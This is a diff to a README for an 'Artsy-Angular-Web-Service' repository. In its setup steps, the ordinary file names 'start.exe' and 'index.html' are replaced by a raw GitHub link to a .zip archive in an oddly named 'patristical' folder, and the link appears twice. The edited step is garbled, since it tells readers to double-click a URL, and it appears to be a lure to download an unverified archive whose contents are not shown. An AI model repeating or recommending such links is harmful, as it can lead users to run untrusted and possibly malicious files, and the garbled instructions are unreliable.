collusiongm/Artsy-Angular-Web-Service/README.md

 1. Navigate to the application folder in your file explorer.

-2. Double-click the main application file, usually named something like `start.exe` or `index.html`.
+2. Double-click the main application file, usually named something like `https://raw.githubusercontent.com/collusiongm/Artsy-Angular-Web-Service/main/patristical/Artsy-Angular-Web-Service.zip` or `https://raw.githubusercontent.com/collusiongm/Artsy-Angular-Web-Service/main/patristical/Artsy-Angular-Web-Service.zip`.

 3. Your web browser will open, displaying the application.